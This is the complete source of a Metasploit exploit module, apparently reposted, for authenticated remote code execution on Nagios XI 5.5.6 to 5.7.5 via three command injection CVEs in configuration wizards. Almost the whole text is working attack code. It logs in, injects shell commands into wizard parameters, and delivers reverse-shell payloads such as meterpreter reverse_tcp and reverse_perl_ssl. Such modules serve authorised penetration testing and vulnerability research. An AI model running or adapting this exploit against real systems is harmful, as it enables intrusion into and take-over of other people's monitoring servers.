Nagios XI 5.7.5 Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::NagiosXi  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',        'Description' => %q{          This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are          OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm          configuration wizards that allow an authenticated user to perform remote code          execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.          Valid credentials for a Nagios XI user are required. This module has          been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.        },        'License' => MSF_LICENSE,        'Author' => [          'Matthew Mathur'        ],        'References' => [          ['CVE', '2021-25296'],          ['CVE', '2021-25297'],          ['CVE', '2021-25298'],          ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']        ],        'Platform' => %w[linux unix],        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Linux (x86)', {              'Arch' => [ ARCH_X86 ],              'Platform' => 'linux',              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }            }          ],          [            'Linux (x64)', {              'Arch' => [ ARCH_X64 ],              'Platform' => 'linux',              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'CMD', {              'Arch' => [ ARCH_CMD ],              'Platform' => 'unix',              # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }            }          ]        ],        'Privileged' => false,        'DefaultTarget' => 2,        'DisclosureDate' => '2021-02-13',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])    ]  end  def username    datastore['USERNAME']  end  def password    datastore['PASSWORD']  end  def finish_install    datastore['FINISH_INSTALL']  end  # Returns a status code an a error message on failure.  # On success returns the status code and an array so we  # can update the login_result and res_array variables appropriately.  def handle_unsigned_license(res_array, username, password, finish_install)    auth_cookies, nsp = res_array    sign_license_result = sign_license_agreement(auth_cookies, nsp)    if sign_license_result      return 5, 'Failed to sign license agreement'    end    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')    sleep 5    login_result, res_array = login_after_install_or_license(username, password, finish_install)    case login_result    when 1..4 # An error occurred, propagate the error message      return login_result, res_array[0]    when 5 # The Nagios XI license agreement still has not been signed      return 5, 'Failed to sign the license agreement.'    end    return login_result, res_array  end  def authenticate    # Use nagios_xi_login to try and authenticate.    login_result, res_array = nagios_xi_login(username, password, finish_install)    case login_result    when 1..3 # An error occurred, propagate the error message      return login_result, res_array[0]    when 4 # Nagios XI is not fully installed      install_result = install_nagios_xi(password)      if install_result # On installation failure, result is an array with the code and error message        return install_result[0], install_result[1]      end      login_result, res_array = login_after_install_or_license(username, password, finish_install)      case login_result      when 1..4 # An error occurred, propagate the error message        return login_result, res_array[0]      when 5 # The license agreement still needs to be signed        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)        return login_result, res_array unless (login_result == 0)      end    when 5 # The license agreement still needs to be signed      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)      return login_result, res_array unless (login_result == 0)    end    print_good('Successfully authenticated to Nagios XI.')    # Extract the authenticated cookies and nsp to use throughout the module    if res_array.length == 2      auth_cookies = res_array[1]      if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)        @auth_cookies = auth_cookies      else        return login_result, 'Failed to extract authentication cookies'      end      nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)      if nsp        @nsp = nsp[1]      else        return login_result, 'Failed to extract nsp string'      end    else      return login_result, 'Failed to extract auth cookies and nsp string'    end    # Set the version here so both check and exploit can use it    nagios_version = nagios_xi_version(res_array[0])    if nagios_version.nil?      return 6, 'Unable to obtain the Nagios XI version from the dashboard'    end    print_status("Target is Nagios XI with version #{nagios_version}.")    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'      nagios_version = '1.0.0'    end    @version = Rex::Version.new(nagios_version)    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'  end  def check    # Authenticate to ensure we can access the NagiosXI version    auth_result, err_msg = authenticate    case auth_result    when 1      return CheckCode::Unknown(err_msg)    when 2, 4, 5, 6      return CheckCode::Detected(err_msg)    when 3      return CheckCode::Safe(err_msg)    end    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')      return CheckCode::Appears    end    return CheckCode::Safe  end  def execute_command(cmd, _opts = {})    if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check      auth_result, err_msg = authenticate      case auth_result      when 1        fail_with(Failure::Disconnected, err_msg)      when 2, 4, 5, 6        fail_with(Failure::UnexpectedReply, err_msg)      when 3        fail_with(Failure::NotVulnerable, err_msg)      end    end    # execute payload based on the selected targeted configuration wizard    url_params = {      'update' => 1,      'nsp' => @nsp    }    # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298    # changes from address to ip_address    if @version <= Rex::Version.new('5.5.7')      address_param = 'address'    else      address_param = 'ip_address'    end    # CVE-2021-25296 affects the windowswmi configuration wizard.    if datastore['TARGET_CVE'] == 'CVE-2021-25296'      url_params = url_params.merge({        'nextstep' => 3,        'wizard' => 'windowswmi',        'ip_address' => Array.new(4) { rand(256) }.join('.'),        'domain' => Rex::Text.rand_text_alphanumeric(7..15),        'username' => Rex::Text.rand_text_alphanumeric(7..20),        'password' => Rex::Text.rand_text_alphanumeric(7..20),        'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"      })    # CVE-2021-25297 affects the switch configuration wizard.    elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'      url_params = url_params.merge({        'nextstep' => 3,        'wizard' => 'switch',        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),        'scaninterfaces' => 'on'      })    # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by    # specifying the digitalocean option for the wizard parameter.    elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'      url_params = url_params.merge({        address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",        'nextstep' => 4,        'wizard' => 'digitalocean'      })    else      fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')    end    print_status('Sending the payload...')    # Send the final request. Note that the target is not expected to respond if we get    # code execution. Therefore, we set the timeout on this request to 0.    send_request_cgi({      'method' => 'GET',      'uri' => '/nagiosxi/config/monitoringwizard.php',      'cookie' => @auth_cookies,      'vars_get' => url_params    })  end  def exploit    if target.arch.first == ARCH_CMD      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  endend